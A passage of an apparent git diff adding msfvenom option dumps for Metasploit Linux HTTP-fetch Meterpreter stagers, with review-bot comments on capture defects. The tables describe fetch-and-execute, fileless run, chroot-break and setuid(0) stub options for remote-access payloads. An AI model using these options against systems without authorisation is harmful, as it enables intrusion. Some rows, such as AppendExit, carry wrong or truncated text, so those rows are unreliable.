https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of 
a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-find_tag.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-find_tag.txt new file mode 100644 index 0000000..8af4237 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-find_tag.txt 
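Review bot: in cmd-linux-http-x86-meterpreter-bind_tcp_uuid.txt the AppendExit row carries the wrong description. It reads `AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root)`, which is the PrependChrootBreak text repeated verbatim further down the same table, so a reader of this reference would conclude that AppendExit escapes a chroot and switches to root rather than doing what its name says, appending an exit stub. The same row appears in every other dump in this patch. Since these files are meant to be verbatim `msfvenom --list-options` captures, do not hand-edit them; confirm the text against the option definition in the framework and, if it is an upstream description bug, say so in the README or file it upstream, so the dumps are not read as authoritative on that point. Two smaller capture problems in this file: the `Total size:` line that every other dump has is missing, and the author block is truncated to `am Webb` with no `Provided by:` header, which points at the capture script cutting lines rather than at msfvenom; regenerate from the raw output and check for completeness before committing.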
@@ -0,0 +1,101 @@ + + Name: HTTP Fetch, Find Tag Stager + Module: payload/cmd/linux/http/x86/meterpreter/find_tag + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 105 + +Evasion options for payload/cmd/linux/http/x86/meterpreter/find_tag: +========================= + +b@rapid7.com> + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZJGqgddAl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. + Use an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. 
+ AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see 
https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to 
preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + TAG XjEz yes The four byte tag to signify the connection. + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_ipv6_tcp.txt new file mode 100644 index 0000000..24cf096 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_ipv6_tcp.txt 
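Review bot: cmd-linux-http-x86-meterpreter-find_tag.txt embeds two per-run random defaults, `FETCH_FILENAME ZJGqgddAl no Name to use on remote system when storing payload` and `TAG XjEz yes The four byte tag to signify the connection.`, so every regeneration of this dump will produce a spurious diff on those rows (the other files show the same problem with FETCH_FILENAME values ntRGzTtlAXTs, sluXEOyTHDc, wyKQhFkS and mQkdiabWbLN). Have the generator normalize these before writing, for instance by masking the Current Setting column for options whose default is randomly generated, otherwise a reviewer cannot tell a real option change from noise. The author block here is cut to `b@rapid7.com>`, the same truncation as in the bind_tcp_uuid file.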
@@ -0,0 +1,110 @@ + + Name: HTTP Fetch, Reverse TCP Stager (IPv6) + Module: payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_ipv6_tcp: +========================= + +d7.com> + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sluXEOyTHDc no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Connect back to attacker over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of 
a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + 
VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_nonx_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_nonx_tcp.txt new file mode 100644 index 0000000..6897916 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_nonx_tcp.txt 
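Review bot: none of the dumps record which framework version they were captured from, and option sets drift between releases. In cmd-linux-http-x86-meterpreter-reverse_ipv6_tcp.txt the reverse-listener rows such as `ReverseListenerThreaded false yes Handle every connection in a new thread (experimental)` and `StagerRetryCount 10 no The number of times the stager should retry if the first connect fails` are absent from the bind and find_tag variants, which is expected for those stagers, but a later framework change to the same rows would be indistinguishable from that. Add a version stamp per file or one in the directory README so the files can be compared meaningfully. For readers of the IPv6 variant it is also worth noting next to `SCOPEID 0 no IPv6 scope ID, for link-local addresses` that the value only matters for link-local LHOSTs. The author block is cut to `d7.com>` as in the other files.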
@@ -0,0 +1,109 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 102 + Rank: +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_nonx_tcp: +========================= + + + skape + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wyKQhFkS no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of 
a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + 
VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp.txt new file mode 100644 index 0000000..d6a142e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp.txt 
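Review bot: cmd-linux-http-x86-meterpreter-reverse_nonx_tcp.txt has an empty `Rank:` line and a blank line in the author block, while the other dumps have no Rank line at all, and every file prints `Platform: Linux, Linux`; the capture script is evidently filtering the header region line by line and doing it inconsistently. Either keep the full header verbatim for all files or strip it for all; a half-stripped header is the worst outcome for a diffable reference. Separately, `FETCH_SRVHOST no Local IP to use for serving payload` is not required here and in the other reverse variants but is required (`yes`) in bind_tcp_uuid; that difference is presumably real, since a reverse stager has an LHOST to fall back on and a bind stager does not, and it deserves a sentence in the README so that it is not "fixed" by hand in a later regeneration.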
@@ -0,0 +1,111 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/reverse_tcp + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 111 + +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_tcp: +========================= + +apid7.com> + skape + egypt + tkmru + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME mQkdiabWbLN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 yes Time (in seconds) to sleep between pingbacks + PrependChrootBreak false no Prepend a stub that will break out of 
a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + SessionCommunicationTimeout 300 no The number of seconds of no activity before this session should be killed + SessionExpirationTimeout 604800 no The number of seconds before this session should be forcibly shut down + SessionRetryTotal 3600 no Number of seconds try reconnecting for on network failure + SessionRetryWait 10 no Number of seconds to wait between reconnect attempts + StageEncoder no Encoder to use if EnableStageEncoding is set + StageEncoderSaveRegisters no Additional registers to preserve in the staged payload if EnableStageEncoding is set + StageEncodingFallback true no Fallback to no encoding if the selected StageEncoder is not compatible + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + 
VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp_uuid.txt b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp_uuid.txt new file mode 100644 index 0000000..44084d8 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-http-x86-meterpreter-reverse_tcp_uuid.txt 
@@ -0,0 +1,111 @@ + + Name: HTTP Fetch, Reverse TCP Stager + Module: payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid + Platform: Linux, Linux + Arch: cmd +Needs Admin: No + Total size: 114 + Rank: +Evasion options for payload/cmd/linux/http/x86/meterpreter/reverse_tcp_uuid: +========================= + + + skape + egypt + OJ Reeves + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME xxwmAiFiLRgN no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute a x86 payload from an HTTP server. 
+ Connect back to the attacker + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + AutoLoadStdapi true yes Automatically load the Stdapi extension + AutoRunScript no A script to run automatically on session creation. + AutoSystemInfo true yes Automatically capture system information on initialization. + AutoUnhookProcess false yes Automatically load the unhook extension and unhook the process + AutoVerifySessionTimeout 30 no Timeout period to wait for session validation to occur, in seconds + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. 
+ EnableStageEncoding false no Encode the second stage payload + EnableUnicodeEncoding false yes Automatically encode UTF-8 strings as hexadecimal + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + HandlerSSLCert no Path to a SSL certificate in unified PEM format, ignored for HTTP transports + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + MeterpreterDebugBuild false no Use a debug version of Meterpreter + MeterpreterDebugLogging no The Meterpreter debug logging configuration, see https://docs.metasploit.com/docs/using-metasploit/advanced/meterpreter/meterpreter-debugging-meterpreter-sessions.html + MeterpreterTryToFork false no Fork a new process if the functionality is available + PayloadProcessCommandLine no The displayed command line that will be used by the payload + PayloadUUIDName no A human-friendly name to reference this unique payload (requires tracking) + PayloadUUIDRaw no A hex string representing the raw 8-byte PUID value for the UUID + PayloadUUIDSeed no A string to use when generating the payload UUID (deterministic) + PayloadUUIDTracking false yes Whether or not to automatically register generated UUIDs + PingbackRetries 0 yes How many additional successful pingbacks + PingbackSleep 30 